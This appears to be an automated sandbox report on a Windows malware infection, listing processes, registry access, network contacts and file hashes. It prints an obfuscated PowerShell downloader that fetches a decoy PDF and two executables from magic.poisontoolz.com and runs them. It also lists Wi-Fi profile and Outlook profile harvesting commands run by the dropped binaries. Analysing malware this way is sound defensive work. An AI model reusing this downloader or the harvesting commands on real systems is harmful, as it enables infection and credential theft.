PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 1700 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 1700 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 1700 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 1700 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 1700 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 1700 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Files.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function bTBrpbwC($sLUJNuBgfBfA, $DKUZcAdbQOceyyJA){[IO.File]::WriteAllBytes($sLUJNuBgfBfA, $DKUZcAdbQOceyyJA)};function qMgSdvYIRRUSjZ($sLUJNuBgfBfA){if($sLUJNuBgfBfA.EndsWith((HEiDtQybOoyVmdi @(70951,71005,71013,71013))) -eq $True){rundll32.exe $sLUJNuBgfBfA }elseif($sLUJNuBgfBfA.EndsWith((HEiDtQybOoyVmdi @(70951,71017,71020,70954))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $sLUJNuBgfBfA}elseif($sLUJNuBgfBfA.EndsWith((HEiDtQybOoyVmdi @(70951,71014,71020,71010))) -eq $True){misexec /qn /i $sLUJNuBgfBfA}else{Start-Process $sLUJNuBgfBfA}};function qKOlApTVNWImMHKgKrr($HXvvEsCPxrUIJvZa){$HFhjjojUglemTDI = New-Object (HEiDtQybOoyVmdi @(70983,71006,71021,70951,70992,71006,71003,70972,71013,71010,71006,71015,71021));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$DKUZcAdbQOceyyJA = $HFhjjojUglemTDI.DownloadData($HXvvEsCPxrUIJvZa);return $DKUZcAdbQOceyyJA};function HEiDtQybOoyVmdi($neuW){$LuPJsyaVetOy=70905;$rnhDacIHSobOT=$Null;foreach($OQvtigeOZOgrvp in $neuW){$rnhDacIHSobOT+=[char]($OQvtigeOZOgrvp-$LuPJsyaVetOy)};return $rnhDacIHSobOT};function kISEaSmnymA(){$iKWnDWTBqeifbvN = $env:AppData + '\';$MdErWExzJnRFtj = $iKWnDWTBqeifbvN + 'Document.pdf';If(Test-Path -Path $MdErWExzJnRFtj){Invoke-Item $MdErWExzJnRFtj;}Else{ $QXivrbIwhnWacVVIbm = qKOlApTVNWImMHKgKrr (HEiDtQybOoyVmdi @(71009,71021,71021,71017,71020,70963,70952,70952,71014,71002,71008,71010,71004,70951,71017,71016,71010,71020,71016,71015,71021,71016,71016,71013,71027,70951,71004,71016,71014,70952,70973,71016,71004,71022,71014,71006,71015,71021,70951,71017,71005,71007));bTBrpbwC $MdErWExzJnRFtj $QXivrbIwhnWacVVIbm;Invoke-Item $MdErWExzJnRFtj;};$BzjEeQAv = $iKWnDWTBqeifbvN + 'File1crypt.exe'; if (Test-Path -Path $BzjEeQAv){qMgSdvYIRRUSjZ $BzjEeQAv;}Else{ $ELYbsewlypYz = qKOlApTVNWImMHKgKrr (HEiDtQybOoyVmdi @(71009,71021,71021,71017,71020,70963,70952,70952,71014,71002,71008,71010,71004,70951,71017,71016,71010,71020,71016,71015,71021,71016,71016,71013,71027,70951,71004,71016,71014,70952,70975,71010,71013,71006,70954,71004,71019,71026,71017,71021,70951,71006,71025,71006));bTBrpbwC $BzjEeQAv $ELYbsewlypYz;qMgSdvYIRRUSjZ $BzjEeQAv;}$kYEycGaL = $iKWnDWTBqeifbvN + 'File2crypt.exe'; if (Test-Path -Path $kYEycGaL){qMgSdvYIRRUSjZ $kYEycGaL;}Else{ $sEFREXgUWGLv = qKOlApTVNWImMHKgKrr (HEiDtQybOoyVmdi @(71009,71021,71021,71017,71020,70963,70952,70952,71014,71002,71008,71010,71004,70951,71017,71016,71010,71020,71016,71015,71021,71016,71016,71013,71027,70951,71004,71016,71014,70952,70975,71010,71013,71006,70955,71004,71019,71026,71017,71021,70951,71006,71025,71006));bTBrpbwC $kYEycGaL $sEFREXgUWGLv;qMgSdvYIRRUSjZ $kYEycGaL;};;;;}kISEaSmnymA;

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\Document.pdf"

C:\Users\Admin\AppData\Roaming\File2crypt.exe

"C:\Users\Admin\AppData\Roaming\File2crypt.exe"

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=7976D2701938C143CEEE98EB0DBD760E --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=7976D2701938C143CEEE98EB0DBD760E --renderer-client-id=2 --mojo-platform-channel-handle=1664 --allow-no-sandbox-job /prefetch:1

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=98176EE9CEE33A0427A03A4DE26D771B --mojo-platform-channel-handle=1840 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=31B3ACEAC2102F4B7E0CEBE272B054CE --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=31B3ACEAC2102F4B7E0CEBE272B054CE --renderer-client-id=4 --mojo-platform-channel-handle=2160 --allow-no-sandbox-job /prefetch:1

C:\Users\Admin\AppData\Roaming\File1crypt.exe

"C:\Users\Admin\AppData\Roaming\File1crypt.exe"

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=5E53667CAD71A60515A0E3471FB2C312 --mojo-platform-channel-handle=2560 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=65AE344A690A01991423F40BD6EDF808 --mojo-platform-channel-handle=2008 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=BC1DB1F616B341ACA525D2BE32A5071A --mojo-platform-channel-handle=2108 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Windows\System32\sihclient.exe

C:\Windows\System32\sihclient.exe /cv apyXpiSGQEezF0sqZFyx6g.0.2

C:\Users\Admin\AppData\Roaming\File1crypt.exe

C:\Users\Admin\AppData\Roaming\File1crypt.exe

C:\Users\Admin\AppData\Roaming\File2crypt.exe

C:\Users\Admin\AppData\Roaming\File2crypt.exe

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\findstr.exe

findstr All

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\SysWOW64\netsh.exe

netsh wlan show profile

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid

Network

Country Destination Domain Proto
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 12.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 16.53.126.40.in-addr.arpa udp
US 8.8.8.8:53 magic.poisontoolz.com udp
US 138.91.171.81:80 tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 172.67.162.192:443 magic.poisontoolz.com tcp
US 8.8.8.8:53 192.162.67.172.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 152.199.19.74:80 tcp
GB 104.77.160.14:80 tcp
GB 23.37.0.169:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 52.142.223.178:80 tcp
US 8.8.8.8:53 udp
N/A 52.167.17.97:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 52.167.17.97:443 tcp
US 8.8.8.8:53 udp
N/A 52.165.165.26:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 20.3.187.198:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 40.127.169.103:443 tcp
US 8.8.8.8:53 udp
N/A 40.127.169.103:443 tcp
US 8.8.8.8:53 udp
N/A 104.77.160.28:80 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
GB 96.16.110.114:80 tcp
US 8.8.8.8:53 udp
US 138.91.171.81:80 tcp
US 8.8.8.8:53 udp
N/A 208.95.112.1:80 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 149.154.167.220:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 162.159.129.233:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 104.18.114.97:80 tcp
GB 96.17.179.41:80 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 104.18.114.97:80 tcp
US 8.8.8.8:53 udp
N/A 151.80.29.83:443 tcp
US 8.8.8.8:53 udp
N/A 136.175.8.205:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 104.18.114.97:80 tcp
N/A 162.159.129.233:443 tcp
GB 96.16.110.114:80 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
GB 96.16.110.114:80 tcp
US 8.8.8.8:53 udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 udp
N/A 52.111.229.19:443 tcp
US 8.8.8.8:53 udp

Files

memory/4468-0-0x0000000004C00000-0x0000000004C36000-memory.dmp

memory/4468-3-0x0000000004D70000-0x0000000004D80000-memory.dmp

memory/4468-2-0x0000000004D70000-0x0000000004D80000-memory.dmp

memory/4468-1-0x0000000072170000-0x0000000072920000-memory.dmp

memory/4468-4-0x00000000053B0000-0x00000000059D8000-memory.dmp

memory/4468-6-0x0000000005B10000-0x0000000005B76000-memory.dmp

memory/4468-5-0x0000000005310000-0x0000000005332000-memory.dmp

memory/4468-12-0x0000000005B80000-0x0000000005BE6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uklsy1xw.nft.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4468-17-0x0000000005CF0000-0x0000000006044000-memory.dmp

memory/4468-18-0x00000000061A0000-0x00000000061BE000-memory.dmp

memory/4468-19-0x00000000061E0000-0x000000000622C000-memory.dmp

memory/4468-22-0x0000000006740000-0x0000000006762000-memory.dmp

memory/4468-23-0x0000000007A40000-0x0000000007FE4000-memory.dmp

memory/4468-21-0x00000000066D0000-0x00000000066EA000-memory.dmp

memory/4468-20-0x00000000073F0000-0x0000000007486000-memory.dmp

memory/4468-24-0x0000000008670000-0x0000000008CEA000-memory.dmp

C:\Users\Admin\AppData\Roaming\Document.pdf

MD5 80a2593453c09724d152e841a3ff0865
SHA1 c73c293d18aac71c530d69ea03314f064f5c6386
SHA256 71d885fd0734c915b43ed11d45750aa67c53a11d6a95c9c8323d9fd6e3b413cd
SHA512 ff131d439c8e06a789fa82ab7d2640ba87ab03b165f6bbf0d8048baad81c797e45c96000312c37dd5d1a53a2996ce7d3b6ccab09470d52840e4e8344f5b04f67

C:\Users\Admin\AppData\Roaming\File1crypt.exe

MD5 d28d630260b12cffcaf5afbd3fcd488d
SHA1 b5b2ffda8805165e393ed23fda6ee02b0de207a0
SHA256 5515c692e4b0b0d99d139baf53394d4eb2e16b05a7a1c906e1406c207e21c5a0
SHA512 81528282cee78b8fdbc795549131bfd2de9c6517664e12228a531999603d14c714faf644587e9618a147e96bf65950388d348c528875d56292d1b924c59cdba8

memory/2236-39-0x0000000000070000-0x00000000001B6000-memory.dmp

memory/2236-41-0x0000000004BC0000-0x0000000004BD0000-memory.dmp

memory/2236-43-0x0000000004CD0000-0x0000000004E06000-memory.dmp

memory/2236-47-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-51-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-57-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-63-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-69-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-75-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-81-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-83-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-79-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-85-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-89-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-91-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-93-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-95-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-87-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-97-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-77-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-99-0x0000000004CD0000-0x0000000004E01000-memory.dmp

C:\Users\Admin\AppData\Roaming\File2crypt.exe

MD5 774c1a62c46b127185ce69e68b3eb323
SHA1 e3bdad0863ad95c1b21a86c4d510c85cae7020ec
SHA256 39818ea97715df3133afda16f56775e0f9928424e99f98e99557bd9b4cb12b54
SHA512 347a598bb94f87334d776b48bbf647a2390d213c450b8afa866497cb7f5ca8cc57fbd28a7d2b3d279fcf81958948c0a354b7cab5b568f8d3b6fbfe894f4bec74

C:\Users\Admin\AppData\Roaming\File2crypt.exe

MD5 5f7664097ffe92ac09565fb443b70849
SHA1 b8f873c802be357a94d5162ee09f5c3e8ebc46e3
SHA256 4467b911160749f59ae0b2308b7270594fc241948aaeda13ff92e7066211f9a3
SHA512 52890416edbe90eab2b42dee114680edbab90051234edcde9a00db4b928056b3da1be04af4618a48afad193b76ec28a27c4ee0d7dd8fc3057a2429af0d84e2b9

memory/3396-129-0x0000000072170000-0x0000000072920000-memory.dmp

memory/3396-131-0x0000000004BC0000-0x0000000004BD0000-memory.dmp

memory/3396-137-0x0000000004BD0000-0x0000000004DD8000-memory.dmp

memory/3396-140-0x0000000005F80000-0x000000000618A000-memory.dmp

memory/4468-132-0x0000000072170000-0x0000000072920000-memory.dmp

memory/3396-128-0x0000000000040000-0x0000000000258000-memory.dmp

C:\Users\Admin\AppData\Roaming\File2crypt.exe

MD5 cf17d3928737eab522ebb617737a6dff
SHA1 5c42ab8b20034607124f97cedb75e34dd80c9172
SHA256 e9765d102669d5457e38082b367469c3669889d459f5efd0f8a6c260356d2ae5
SHA512 af4903ecaa217cf3843b793b11ac387a205a3088defef08e4635929ed1de9bdb2c36fba11df17c84ca2b2a691edf2f9d4e51224242538e0bba18c992da0775ab

memory/2236-115-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-113-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-105-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-101-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-73-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-71-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-67-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-65-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-61-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-59-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-55-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-53-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-49-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-45-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-44-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-42-0x0000000004A80000-0x0000000004BB6000-memory.dmp

memory/2236-40-0x0000000072170000-0x0000000072920000-memory.dmp

C:\Users\Admin\AppData\Roaming\File1crypt.exe

MD5 d53f91c99e731fae151b03b600b1b05b
SHA1 3d06e3a29acdf75eef3698c0cf72e16990def99c
SHA256 3e16b688dd6eded9503ebf4a804adaae02e4628cc1cc52c749e17c3ed58123be
SHA512 5f60964eb2d4df0d0ff7544fb78568e01a7b0f9cd133e509ed17243f858b0acac415d85d03212746af207d4169d7b01a715a5ada92bfe52d417ac25cd55fd8d7

C:\Users\Admin\AppData\Roaming\File1crypt.exe

MD5 29c11e7b0c44cbbfec546b0469dcc8a2
SHA1 1227f46ba3b08ebad1a6f3536d4e523f5830a12c
SHA256 572de60da00d0f6ef8657e766d84a5284f3a90d6b6d4cd8795ef1d5af95c0ee6
SHA512 143bf88b9d6d07bb0fb0b059d2b6ea2c529e9a401c55653e94fd79285a4e506e42cdd0bc0d5ae7877a0062d3de76dedf1f94c7cfaded7db0f57aa53b581cae06

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

MD5 d0df5f9974138501424cb06472477adf
SHA1 9d143e2c9c48327c6fa0b4f2fb65be982037db51
SHA256 6c3615c908cb98afc062e70b7f985bf7b667fd8540a25824aa07a14b6b6a05d6
SHA512 9a7d8b47a8311e00ba206fee9bf0d42991a0caaf43492ea067bb6c9eb333a3231a35bae1efcd95add82d6dbfcfef5e10d42c084b9e73c5fdd7eadf8131324617

C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

MD5 21c7373cbebe36d40311199e37a311ff
SHA1 4966bb36fa9545fa8481d1314471a374f3d053c3
SHA256 9219e342d27bc5f3824eb6198773d7953e840b9e62220de75c4652fdfac3815a
SHA512 a09399ab463e5616d61345a0c3538e3ea34d185e12f525ffb7b7f3d364771f7d142969a4e10221c5cb6129b934f48eeae122e0bd50a57ac7f1d0eadb9bdece20

memory/2236-2007-0x0000000005190000-0x000000000525E000-memory.dmp

